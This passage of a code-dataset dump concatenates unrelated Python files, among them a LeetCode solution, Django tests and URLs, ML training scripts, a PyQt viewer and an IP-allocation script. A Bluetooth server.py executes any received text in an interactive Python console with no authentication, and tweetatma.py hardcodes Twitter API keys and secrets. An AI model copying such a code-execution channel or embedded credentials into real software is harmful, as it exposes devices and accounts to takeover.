Similar to 3sum\n if i > 0 and nums[i] == nums[i - 1]:\n continue\n cur = nums[i]\n _dfs(nums[:i] + nums[i + 1:], subset + [cur], output)\n\n output = []\n _dfs(nums, [], output)\n return output\n","sub_path":"leetcode/lc47_Permutations_II.py","file_name":"lc47_Permutations_II.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327026021","text":"import pika\nfrom crawler import *\nfrom config import *\n\nconnection = pika.BlockingConnection(parameters=RabbitConfig.get_rabbit_params())\nchannel = connection.channel()\nchannel.basic_qos(prefetch_count=1)\nchannel.queue_declare(queue = RabbitConfig.UAEJJF_PROFILE_INFO, durable = True)\n\ndef save_to_db(ch, method, properties, body):\n body = json.loads(body)\n profile_id = body.get(\"profile_id\")\n profile = uaejjf_parse_profile(profile_id)\n uaejjf_save_profile(profile)\n ch.basic_ack(delivery_tag = method.delivery_tag)\n\ndef run():\n channel.basic_consume(on_message_callback = save_to_db, queue = RabbitConfig.UAEJJF_PROFILE_INFO)\n channel.start_consuming()\n\nrun()","sub_path":"uaejjf_profile_info.py","file_name":"uaejjf_profile_info.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86293778","text":"from django.test import TestCase\nfrom django.test import tag\nfrom django.utils import timezone\n\nfrom model_mommy import mommy\n\nfrom instructions.models import (\n Instruction, InstructionAdditionQuestion, InstructionConditionsOfInterest,\n InstructionPatient\n)\nimport datetime\nfrom accounts.models import User, ClientUser, Patient, GeneralPracticeUser\nfrom snomedct.models import SnomedConcept\nfrom instructions.model_choices import *\nfrom instructions.cron.notification_mail import instruction_notification_email_job\nfrom django.core import mail\nfrom django.contrib.contenttypes.models import ContentType\nfrom snomedct.models import SnomedConcept\n\n\nclass InstructionReminderTest(TestCase):\n def setUp(self):\n self.now = timezone.now()\n content_type = ContentType.objects.get(model='organisationgeneralpractice')\n self.instruction = mommy.make(\n Instruction, gp_practice_type=content_type,\n )\n\n def test_reminder_3_days(self):\n self.instruction.created=self.now-datetime.timedelta(days=3)\n self.instruction.save()\n instruction_notification_email_job()\n self.assertEqual(3, self.instruction.reminders.filter(reminder_day=3).first().reminder_day)\n\n def test_reminder_7_days(self):\n self.instruction.created=self.now-datetime.timedelta(days=7)\n self.instruction.save()\n instruction_notification_email_job()\n self.assertEqual(7, self.instruction.reminders.filter(reminder_day=7).first().reminder_day)\n\n def test_reminder_14_days(self):\n self.instruction.created=self.now-datetime.timedelta(days=14)\n self.instruction.save()\n instruction_notification_email_job()\n self.assertEqual(14, self.instruction.reminders.filter(reminder_day=14).first().reminder_day)\n\n\nclass InstructionPatientTest(TestCase):\n def setUp(self):\n self.patient_telephone_code='111'\n self.patient_alternate_code='112'\n self.instruction_patient = mommy.make(InstructionPatient,\n patient_first_name='aaa',\n patient_last_name='bbb'\n )\n\n def test_get_phone_without_zero(self):\n self.assertEqual(InstructionPatient.get_phone_without_zero(self, '12345'), '12345')\n self.assertEqual(InstructionPatient.get_phone_without_zero(self, '012345'), '12345')\n\n def 
test_get_telephone_e164(self):\n telephone = InstructionPatient.get_phone_without_zero(self, '012345')\n self.assertEqual('+11112345', \"+%s%s\"%(self.patient_telephone_code, telephone))\n\n def test_get_alternate_e164(self):\n alternate = InstructionPatient.get_phone_without_zero(self, '054321')\n self.assertEqual('+11254321', \"+%s%s\"%(self.patient_alternate_code, alternate))\n\n\nclass InstructionTest(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.to_email = 'sample@domain.com'\n cls.user_1 = mommy.make(User, username='test_user_1', first_name='client')\n cls.user_2 = mommy.make(User, username='test_user_2', first_name='patient')\n cls.user_3 = mommy.make(User, username='gpuser', first_name='gpuser')\n cls.client_user = mommy.make(ClientUser, user=cls.user_1)\n cls.patient = mommy.make(Patient, user=cls.user_2)\n cls.instruction = mommy.make(\n Instruction, client_user=cls.client_user, patient=cls.patient, type=SARS_TYPE\n )\n cls.sars = SARS_TYPE\n cls.amra = AMRA_TYPE\n\n def test_string_representation(self):\n instruction_string = str(self.instruction)\n instruction_id = self.instruction.id\n self.assertEqual(instruction_string, 'Instruction #{id}'.format(id=instruction_id))\n\n def test_in_progress(self):\n self.instruction.status = INSTRUCTION_STATUS_PROGRESS\n self.assertEqual(1, self.instruction.status)\n\n def test_reject(self):\n gpuser = mommy.make(\n GeneralPracticeUser,\n user=self.user_3,\n role=0\n )\n self.instruction.rejected_reason = \"rejected reason\"\n self.instruction.rejected_note = \"rejected note\"\n self.instruction.rejected_by = self.user_3\n self.instruction.rejected_timestamp = timezone.now()\n self.instruction.status = INSTRUCTION_STATUS_REJECT\n self.assertEqual(4, self.instruction.status)\n\n def test_send_no_reject_email_to_patient_or_client(self):\n self.assertEqual(len(mail.outbox), 0)\n\n def test_get_type(self):\n self.assertEqual('SARS', self.instruction.type)\n\n def test_is_sars(self):\n self.assertEqual('SARS', self.sars)\n\n def test_is_amra(self):\n self.assertEqual('AMRA', self.amra)\n\n\nclass InstructionAdditionQuestionTest(TestCase):\n def test_string_representation(self):\n instruction_addition_question = mommy.make(\n InstructionAdditionQuestion, question='test_question?'\n )\n self.assertEqual(str(instruction_addition_question), 'test_question?')\n\n\nclass InstructionConditionsOfInterestTest(TestCase):\n def test_string_representation(self):\n snomedct = mommy.make(\n SnomedConcept, fsn_description='fsn_description',\n external_id=1234567890\n )\n instruction_conditions_of_interest = mommy.make(\n InstructionConditionsOfInterest, snomedct=snomedct\n )\n self.assertEqual(\n str(instruction_conditions_of_interest),\n 'fsn_description (1234567890)'\n )\n","sub_path":"instructions/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179293997","text":"\"\"\"\nA simple Python script to receive messages from a client over\nBluetooth using PyBluez (with Python 3.7).\n\"\"\"\n\nimport readline\nimport code\nimport bluetooth, time\nimport ports\nhostMACAddress = '' #leave empty\nport = 3\nbacklog = 1\nsize = 1024\ns = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\ns.bind((hostMACAddress, port))\ns.listen(backlog)\nvars = globals().copy()\nvars.update(locals())\nshell = code.InteractiveConsole(vars)\nprint(\"up and running\")\ntry:\n client, clientInfo = s.accept()\n while 1:\n data = 
client.recv(size)\n if data:\n #time.sleep(0.1)\n msg = data.decode()\n print(msg)\n shell.push(msg)\n #time.sleep(0.1)\n client.send(\"Yes\") # Echo back to client\nexcept: \n print(\"Closing socket\")\n client.close()\n s.close()","sub_path":"Ball Thrower/NewFirmware/SpeechToTxt/airtable/blue/bluetest2/bluetest/bluett/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"362679313","text":"\"\"\"guizi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nimport core.management.urls as API_URL\nimport core.views as front\nfrom guizi import settings\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^management/', include(API_URL)),\n url(r'^user/', include('userena.urls')),\n url(r'^comments/', include('django_comments.urls')),\n url(r'^$', front.home, name=\"title\"),\n url(r'^uploads/', front.uploads),\n url(r'^shop/$', front.shop),\n url(r'^shop/list/$', front.shop_list),\n # url(r'^shop/type/(?P[^/]+)/$', front.type),\n # url(r'^shop/brand/(?P[^/]+)/$', front.brand),\n url(r'^shop/(?P\\\d+)$', front.product_info),\n url(r'^portfolio/$', front.portfolio),\n url(r'^portfolio/(?P[^/]+)/$', front.portfolio_info),\n url(r'^article/$', front.blog),\n url(r'^article/(?P[^/]+)/$', front.article_info),\n url(r'^activity/(?P[^/]+)/$', front.activity_infor),\n url(r'like/', front.like),\n url(r'about-us/', front.aboutus, name=\"find-us\"),\n url(r'find-us/', front.contact),\n url(r'^search/', include('haystack.urls')),\n]\n\n# Add media and static files\nurlpatterns += staticfiles_urlpatterns()\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"guizi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"237118719","text":"\"\"\"\nImplementing faster_rcnn_resnet50_coco from\nTensorFlow1 Detection Model Zoo\n(https://github.com/tensorflow/models/blob/master/research/\nobject_detection/g3doc/tf1_detection_zoo.md)\n\"\"\"\n\nfrom art.estimators.object_detection.tensorflow_faster_rcnn import TensorFlowFasterRCNN\nimport tensorflow as tf\n\n\nclass TensorFlowFasterRCNNOneIndexed(TensorFlowFasterRCNN):\n \"\"\"\n This is an MSCOCO pre-trained model. Note that the inherited TensorFlowFasterRCNN class\n outputs 0-indexed classes, while this wrapper class outputs 1-indexed classes. A label map can be found at\n https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_label_map.pbtxt\n\n This model only performs inference and is not trainable. 
To train\n or fine-tune this model, please follow instructions at\n https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/tf1.md\n \"\"\"\n\n def __init__(self, images):\n super().__init__(\n images,\n model=None,\n filename=\"faster_rcnn_resnet50_coco_2018_01_28\",\n url=\"http://download.tensorflow.org/models/object_detection/faster_rcnn_resnet50_coco_2018_01_28.tar.gz\",\n sess=None,\n is_training=False,\n clip_values=(0, 1),\n channels_first=False,\n preprocessing_defences=None,\n postprocessing_defences=None,\n attack_losses=(\n \"Loss/RPNLoss/localization_loss\",\n \"Loss/RPNLoss/objectness_loss\",\n \"Loss/BoxClassifierLoss/localization_loss\",\n \"Loss/BoxClassifierLoss/classification_loss\",\n ),\n )\n\n def compute_loss(self, x, y):\n raise NotImplementedError\n\n def loss_gradient(self, x, y, **kwargs):\n y_zero_indexed = []\n for y_dict in y:\n y_dict_zero_indexed = y_dict.copy()\n y_dict_zero_indexed[\"labels\"] = y_dict_zero_indexed[\"labels\"] - 1\n y_zero_indexed.append(y_dict_zero_indexed)\n return super().loss_gradient(x, y_zero_indexed, **kwargs)\n\n def predict(self, x, **kwargs):\n list_of_zero_indexed_pred_dicts = super().predict(x, **kwargs)\n list_of_one_indexed_pred_dicts = []\n for img_pred_dict in list_of_zero_indexed_pred_dicts:\n zero_indexed_pred_labels = img_pred_dict[\"labels\"]\n img_pred_dict[\"labels\"] = zero_indexed_pred_labels + 1\n list_of_one_indexed_pred_dicts.append(img_pred_dict)\n return list_of_one_indexed_pred_dicts\n\n\ndef get_art_model(model_kwargs, wrapper_kwargs, weights_file=None):\n # APRICOT inputs should have shape (1, None, None, 3) while DAPRICOT inputs have shape\n # (3, None, None, 3)\n images = tf.placeholder(\n tf.float32, shape=(model_kwargs.get(\"batch_size\", 1), None, None, 3)\n )\n model = TensorFlowFasterRCNNOneIndexed(images)\n return model\n","sub_path":"armory/baseline_models/tf_graph/mscoco_frcnn.py","file_name":"mscoco_frcnn.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505470408","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 26 13:50:42 2020\n\n@author: hp\n\"\"\"\nimport math\nimport tensorflow as tf\nfrom keras.preprocessing.image import ImageDataGenerator\ntf.__version__\n\ncompute_step_epoch=lambda x:int(math.ceil(1.* x/32))# calculates steps per epoch for batch size 32\n\n\ncnn = tf.keras.models.Sequential()\n\n# Step 1 - Convolution\ncnn.add(tf.keras.layers.Conv2D(filters=32, kernel_size=3, padding=\"same\", activation=\"relu\", input_shape=(64, 64, 3)))\n\n# Step 2 - Pooling\ncnn.add(tf.keras.layers.MaxPool2D(pool_size=2, strides=2, padding='valid'))\n\n# Adding a second convolutional layer (to improve accuracy)\ncnn.add(tf.keras.layers.Conv2D(filters=32, kernel_size=3, padding=\"same\", activation=\"relu\"))\ncnn.add(tf.keras.layers.MaxPool2D(pool_size=2, strides=2, padding='valid'))\n\n# Step 3 - Flattening\ncnn.add(tf.keras.layers.Flatten())\n\n# Step 4 - Full Connection\ncnn.add(tf.keras.layers.Dense(units=128, activation='relu'))\n\n# Step 5 - Output Layer\ncnn.add(tf.keras.layers.Dense(units=1, activation='sigmoid'))\n\n\n\n# Part 3 - Training the CNN\n\n# Compiling the CNN\ncnn.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])# binary_crossentropy matches the single sigmoid output unit\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\n# Generating images for the Test set\ntest_datagen = 
ImageDataGenerator(rescale = 1./255)\n\n# Creating the Training set\ntraining_set = train_datagen.flow_from_directory('data_set/train',\n target_size = (64, 64),\n batch_size = 32,\n class_mode = 'binary')\n\n# Creating the Test set\ntest_set = test_datagen.flow_from_directory('data_set/test',\n target_size = (64, 64),\n batch_size = 32,\n class_mode = 'binary')\n\nsteps_of_epochs_training=compute_step_epoch(1452)\nsteps_of_epoch_test=compute_step_epoch(363)\n# Training the CNN on the Training set and evaluating it on the Test set\ncnn.fit_generator(training_set,\n steps_per_epoch = steps_of_epochs_training,# ceil(no. of training images / batch size)\n epochs = 25,\n validation_data =test_set,\n validation_steps = steps_of_epoch_test)\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627749737","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 5 16:02:03 2018\n\n@author: watec\n\"\"\"\n\nimport tensorflow as tf\n\n#create a graph\ng = tf.Graph()\n\n#Establish the graph as the \"default\" graph\nwith g.as_default():\n #Assemble a graph consisting of the following three operations\n # *Two tf.constant operations to create the operands.\n # *One tf.add operation to add the two operands.\n x = tf.constant(8, name=\"x_const\")\n y = tf.constant(5, name=\"y_const\")\n sum = tf.add(x, y, name=\"x_y_sum\")\n z = tf.constant(4, name=\"z_const\")\n new_sum = tf.add(sum, z, name=\"x_y_z_sum\")\n \n #Now create a session.\n #The session will run the default graph.\n with tf.Session() as sess:\n print(new_sum.eval())","sub_path":"tensorflow_programming_concepts.py","file_name":"tensorflow_programming_concepts.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178529412","text":"import numpy as np\r\nimport re\r\ndef readToMatrix(filename,name):\r\n f=open(filename,\"rt\")\r\n#\r\n if name in ['pssm','psfm','pssmAndLabels','psfmAndLabels']:\r\n pssm=[]\r\n for j,line in enumerate(f.readlines()):\r\n if j > 2:\r\n line=line.strip()\r\n overall_vec = re.split(r\" +\",line)\r\n if len(overall_vec)<44:\r\n break\r\n else:\r\n pssm.append(overall_vec[:42])\r\n pssm=np.array(pssm)\r\n if name == 'pssm':\r\n return pssm[:, 2:22].astype(np.float) #\r\n elif name == 'psfm':\r\n return pssm[:, 22:42].astype(np.float) #\r\n elif name == 'pssmAndLabels':\r\n return pssm[:, 2:22].astype(np.float), pssm[:, 1] #\r\n elif name == 'psfmAndLabels':\r\n return pssm[:, 22:42].astype(np.float), pssm[:, 1] #\r\n\r\n#\r\ndef autoNorm(matrix,name):\r\n if name==\"pssm\":\r\n matrix=matrix.astype(np.float)\r\n matrix = 1 / (1 + np.exp(0 - matrix))\r\n elif name==\"psfm\":\r\n matrix=matrix.astype(np.float)\r\n matrix = matrix / 100\r\n return matrix\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"iT4SE-EP (320D)/readToMatrix.py","file_name":"readToMatrix.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86339296","text":"# from downloader import DownloaderThread\nfrom ctypes import alignment\nfrom queue import Queue\nimport time\n# import yaml\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n# import utils\nimport math\nimport tomli\nfrom config import Config\nfrom media import Media\nfrom downloader import DownloaderThread\nimport utils\n\nfrom random import randrange\n\nfrom 
PyQt5.QtCore import Qt, pyqtProperty, QTimer, QAbstractAnimation, QTimeLine, QSize, QPointF, QPoint\nfrom PyQt5.QtWidgets import QLabel, QWidget\nfrom PyQt5.QtGui import QPainter, QStaticText, QTransform, QImage, qRgba, QColor, qRed, QRgba64, qRgb, QGradient, \\\n QLinearGradient, QBrush\n\n\n# based on https://stackoverflow.com/a/10655396/160630 - thanks!\n\nclass marqueeLabel(QLabel):\n\n def __init__(self, parent):\n super(marqueeLabel, self).__init__(parent)\n self.staticText = QStaticText()\n self.staticText.setTextFormat(Qt.PlainText)\n self._string = ''\n self.timer = QTimer()\n self.timer.setInterval(10)\n self.timer.setTimerType(Qt.PreciseTimer)\n self.timer.timeout.connect(self.timerTimeout)\n self.waitTimer = QTimer()\n self.waitTimer.setInterval(2000)\n self.waitTimer.timeout.connect(self.timerTimeout)\n self.leftMargin = self.height() / 3\n self.scrollPos = 0\n self.buffer = QImage()\n self.alphaChannel = QImage()\n self.scrollEnabled = False\n self.waiting = True\n self.seperator = ' -- '\n self.updateText()\n\n def text(self):\n return self._string\n\n def setText(self, string):\n self._string = string\n self.updateText()\n self.update()\n self.updateGeometry()\n\n def sizeHint(self):\n return QSize(min(self.wholeTextSize.width() + self.leftMargin, self.maximumWidth()),\n self.fontMetrics().height())\n\n def updateText(self):\n self.timer.stop()\n\n self.singleTextWidth = self.fontMetrics().width(self._string)\n self.scrollEnabled = self.singleTextWidth > self.width() - self.leftMargin\n\n if self.scrollEnabled:\n\n self.staticText.setText(self._string + self.seperator)\n if not self.window().windowState() & Qt.WindowMinimized:\n self.scrollPos = 0\n self.waitTimer.start()\n self.waiting = True\n else:\n self.staticText.setText(self._string)\n\n self.staticText.prepare(QTransform(), self.font())\n self.wholeTextSize = QSize(self.fontMetrics().width(self.staticText.text()),\n self.fontMetrics().height())\n\n # self.setFixedWidth()\n\n def hideEvent(self, event):\n if self.scrollEnabled:\n self.scrollPos = 0\n self.timer.stop()\n self.waitTimer.stop()\n\n def showEvent(self, event):\n if self.scrollEnabled:\n self.waitTimer.start()\n self.waiting = True\n\n def paintEvent(self, paintevent):\n painter = QPainter(self)\n\n if self.scrollEnabled:\n self.buffer.fill(qRgba(0, 0, 0, 0))\n pb = QPainter(self.buffer)\n pb.setPen(painter.pen())\n pb.setFont(painter.font())\n\n x = min(-self.scrollPos, 0) + self.leftMargin\n while x < self.width():\n pb.drawStaticText(QPointF(x, (self.height() - self.wholeTextSize.height()) / 2), self.staticText)\n x += self.wholeTextSize.width()\n # apply Alpha channel\n pb.setCompositionMode(QPainter.CompositionMode_DestinationIn)\n pb.setClipRect(self.width() - 15, 0, 15, self.height())\n pb.drawImage(0, 0, self.alphaChannel)\n pb.setClipRect(0, 0, 15, self.height())\n pb.drawImage(0, 0, self.alphaChannel)\n painter.drawImage(0, 0, self.buffer)\n else:\n painter.drawStaticText(QPointF(self.leftMargin,\n (self.height() - self.wholeTextSize.height()) / 2),\n self.staticText)\n\n def resizeEvent(self, resizeEvent):\n # When the widget is resized, we need to update the alpha channel.\n self.alphaChannel = QImage(self.size(), QImage.Format_ARGB32_Premultiplied)\n self.buffer = QImage(self.size(), QImage.Format_ARGB32_Premultiplied)\n self.alphaChannel.fill(qRgba(0, 0, 0, 0))\n self.buffer.fill(qRgba(0, 0, 0, 0))\n if self.width() > 64:\n grad = QLinearGradient(QPointF(0, 0), QPointF(16, 0))\n grad.setColorAt(0, QColor(0, 0, 0, 0))\n grad.setColorAt(1, 
QColor(0, 0, 0, 255))\n painter = QPainter(self.alphaChannel)\n painter.setBrush(grad)\n painter.setPen(Qt.NoPen)\n painter.drawRect(0, 0, 16, self.height())\n grad = QLinearGradient(QPointF(self.alphaChannel.width() - 16, 0),\n QPointF(self.alphaChannel.width(), 0))\n grad.setColorAt(0, QColor(0, 0, 0, 255))\n grad.setColorAt(1, QColor(0, 0, 0, 0))\n painter.setBrush(grad)\n painter.drawRect(self.alphaChannel.width() - 16, 0, self.alphaChannel.width(), self.height())\n # filename = 'alphaChannel'+str(randrange(0, 100000))+'.png'\n # print('writing '+filename)\n # self.alphaChannel.save(filename, 'PNG')\n else:\n self.alphaChannel.fill(QColor(0, 0, 0))\n\n newScrollEnabled = (self.singleTextWidth > self.width() - self.leftMargin)\n if not newScrollEnabled == self.scrollEnabled:\n self.updateText()\n\n def timerTimeout(self):\n self.scrollPos = (self.scrollPos + 5) % \\\n self.wholeTextSize.width()\n if self.waiting == True:\n self.waiting = False\n self.timer.start()\n self.waitTimer.stop()\n if self.scrollPos == 0:\n self.waiting = True\n self.timer.stop()\n self.waitTimer.start()\n\n self.update()\n\n\nclass Blink(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n \n self.config = Config(\"config.toml\")\n self.title = 'Blink'\n\n # #Start downloader\n self.media_current: Media = None\n self.media_queue = Queue(maxsize=self.config.max_queue_size)\n self.downloader_thread = DownloaderThread(self.config, self.media_queue)\n self.downloader_thread.start()\n\n #Start viewer\n\n self._viewer_timer = QtCore.QTimer()\n self._viewer_timer.setSingleShot(True)\n self._viewer_timer.timeout.connect(self.show_media)\n\n # Clean folders and create buffers\n utils.delete_everything_in_folder(self.config.media_dir)\n utils.create_folder(self.config.media_dir)\n\n self.initUI()\n\n\n\n def initUI(self):\n self.setWindowTitle(self.title)\n\n screenShape = QtWidgets.QDesktopWidget().screenGeometry()\n #self.setFixedSize(screenShape.width(),screenShape.height())\n\n widget = QWidget()\n \n\n self.label_movie = QtWidgets.QLabel(widget)\n self.label_movie.setStyleSheet(\"background-color: black\")\n self.label_movie.setFixedSize(screenShape.width(),screenShape.height())\n \n self.label_movie.setAlignment(Qt.AlignmentFlag.AlignHCenter)\n\n\n self.label_marquee = marqueeLabel(widget)\n self.label_marquee.setStyleSheet(\"background-color: rgba(255, 255, 255, 150);\")\n self.label_marquee.setText(\"suck my big fat juicy cock suck my big fat juicy cock suck my big fat juicy cock\")\n self.label_marquee.setFont(QtGui.QFont(\"Sans Serif\",50))\n self.label_marquee.setFixedWidth(screenShape.width())\n # drop_shadow = QtWidgets.QGraphicsDropShadowEffect()\n # drop_shadow.setBlurRadius(20)\n # drop_shadow.setColor(QtGui.QColor(\"#000000\"))\n # drop_shadow.setOffset(5,5)\n # l.setGraphicsEffect(drop_shadow)\n\n layout_box = QtWidgets.QHBoxLayout(widget)\n layout_box.setContentsMargins(0, 0, 0, 0)\n layout_box.addWidget(self.label_marquee, alignment=Qt.AlignmentFlag.AlignBottom)\n \n \n widget.setLayout(layout_box)\n self.setCentralWidget(widget)\n\n self.showFullScreen()\n\n\n def show_media(self):\n print(\"Timer tick\")\n \n\n if self.media_current is not None:\n utils.remove_file(self.media_current.filepath)\n\n #Fetch new image from queue\n self.media_current = self.media_queue.get()\n\n #self.media_current = Media(\"toolschan.jpg\",\"sir please help me, me and my family are in dire need of memes. 
quickly, with haste, help feed my starving children\")\n if self.media_current is None:\n pass\n \n if self.media_current.isValid():\n movie = QtGui.QMovie(self.media_current.filepath)\n \n if movie.isValid():\n self.label_movie.setMovie(movie)\n self.label_marquee.setText(self.media_current.title)\n movie.start()\n \n timer = QtCore.QTimer.singleShot(10000, self.show_media)\n\n\n def showBlink(self):\n self.showFullScreen()\n\n def hideBlink(self):\n self.hide()\n\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ex = Blink()\n ex.show_media()\n sys.exit(app.exec_())\n","sub_path":"blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":9502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128475169","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 1 21:51:11 2019\n\n@author: fengmingshan\n\"\"\"\n\n\nfrom IPy import IP\nimport pandas as pd\n\ndef get_ip_list(begin_ip, count, netmask):\n ip_list = '' #用来存放生成的IP地址\n begin_ip = IP(begin_ip)\n ip_list += str(begin_ip) + '\\n' #将第一个地址放入ip_列表中\n if begin_ip.version() == 4:\n for i in range(count):\n ip = IP(begin_ip)\n new_ip = IP(ip.ip + 2 ** (32 - netmask))\n begin_ip = str(new_ip)\n ip_list += begin_ip + '\\n'\n else:\n for i in range(count):\n ipv6 = IP(begin_ip)\n new_ipv6 = IP(ipv6.ip + 2 ** (128 - netmask))\n begin_ip = str(new_ipv6)\n ip_list += begin_ip + '\\n'\n return ip_list\n\nif __name__ == \"__main__\":\n num = 20\n mask = 28\n start_ip = '53.3.16.144'\n ipv4_list = get_ip_list(begin_ip = start_ip, count=num-1, netmask=mask)\n print('批量分配业务IPv4地址:')\n print('============================')\n print(ipv4_list)\n\n ip_list = ipv4_list.strip().split('\\n')\n gateway = ['.'.join(x.split('.')[:-1])+'.'+str(int(x.split('.')[-1])+1) for x in ip_list]\n ip_num = [IP(x+'/{}'.format(mask)).len()-3 for x in ip_list]\n ip_add_begin = [str(IP(x+'/{}'.format(mask))[2]) for x in ip_list]\n ip_add_end = [str(IP(x+'/{}'.format(mask))[-2]) for x in ip_list]\n\n df_ip = pd.DataFrame({\n 'no':range(len(ip_list)),\n 'IP地址段':ip_list,\n '网关':gateway,\n '掩码':mask,\n '数量':ip_num,\n '起始地址':ip_add_begin,\n '终止地址':ip_add_end,\n '区县':'',\n '厂家':'',\n '备注':'',\n })\n with open(r'C:\\Users\\Administrator\\Desktop\\IPv4_address.csv','w',newline = '') as f:\n df_ip.to_csv(f,index = False)\n# ipv6_list2 = get_ip_list(begin_ip = 'FD00:0:2e3f::', count=10, netmask=127)\n# print('批量分配互联IPv6地址:')\n# print('============================')\n# print(ipv6_list2)\n#\n# ip_list = get_ip_list(begin_ip='192.168.1.0', count=10,netmask=24)\n# print('批量分配业务IPv4地址:')\n# print('============================')\n# print(ip_list)\n#\n# ip_list2 = get_ip_list(begin_ip='192.168.2.0', count = 10, netmask=30)\n# print('批量分配互联IPv4地:')\n# print('============================')\n# print(ip_list2)","sub_path":"处理IP地址/批量分配IP地址_IPv4.py","file_name":"批量分配IP地址_IPv4.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120105095","text":"#!/usr/bin/env python\n \nimport sys\nimport tweepy\n \nCONSUMER_KEY = 'etyKJW6igiXRy8Aw2n4C2bSzP'\nCONSUMER_SECRET = 'WdqSlquoEoHpXysRdMr35ZFAKMF8jMIZTosv4bZkJjRkG1KU5Z'\nACCESS_KEY = '1573473253-APBbG3lAybQdEuJekavwWbmMSRp312sjYl6n9rt'\nACCESS_SECRET = 'gfqpK1QiYR31gw0U8YUtIYJvnsPUXkfYxRBcvyakwLgcN'\n \ntwitter = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\ntwitter.set_access_token(ACCESS_KEY, ACCESS_SECRET)\napi = tweepy.API(twitter)\napi.update_status('merhaba 
pi :)')","sub_path":"tweetatma.py","file_name":"tweetatma.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502506324","text":"#! /usr/bin/env pypy\n\ndef factorial(n):\n o = 1\n while n > 1:\n o = o * n\n n -= 1\n return o\n\nn = factorial(100)\nprint(n)\nprint(sum(map(int, str(n))))\n","sub_path":"euler_20.py","file_name":"euler_20.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178948611","text":"\"\"\"Run EPI on oscillating 2D LDS. \"\"\"\n\nfrom epi.models import Model, Parameter\nfrom epi.example_eps import linear2D_freq\nfrom epi.util import sample_aug_lag_hps\nimport numpy as np\nimport tensorflow as tf\nimport argparse\n\nDTYPE = np.float32\n\n# Get random seed.\nparser = argparse.ArgumentParser()\nparser.add_argument('--seed', type=int)\nparser.add_argument('--d', type=int)\nargs = parser.parse_args()\n\nprint('Running epi for matrix determinant with hyper parameter random seed %d.' % args.seed)\nd = args.d\n\n\n# 1. Define model: dxd matrix\nD = d**2\n\n# Set up the bound vectors.\nlb_val = -2.\nub_val = 2.\nlb_diag = 1.\ndef off_diag(d, val):\n x = val*np.ones((d,d), dtype=DTYPE)\n for i in range(d):\n x[i,i] = 0.\n return x\nlb = np.reshape(lb_diag*np.eye(d) + off_diag(d, lb_val), (D,))\nub = ub_val*np.ones((D,))\n\n# Define the parameter A.\nA = Parameter(\"A\", D, lb=lb, ub=ub)\nparameters = [A]\n\n# Define the model matrix.\nM = Model(\"matrix\", parameters)\n\n# 2. Define the emergent property: E[det(A)] = 100, std(det(A)) = 5\nmu = np.array([100., 5.], dtype=np.float32)\n\n@tf.function\ndef _det(A):\n N = A.get_shape()[0]\n A = tf.reshape(A, (N, d, d))\n detA = tf.linalg.det(A)\n T_x = tf.stack([detA, tf.square(detA-mu[0])], axis=1)\n return 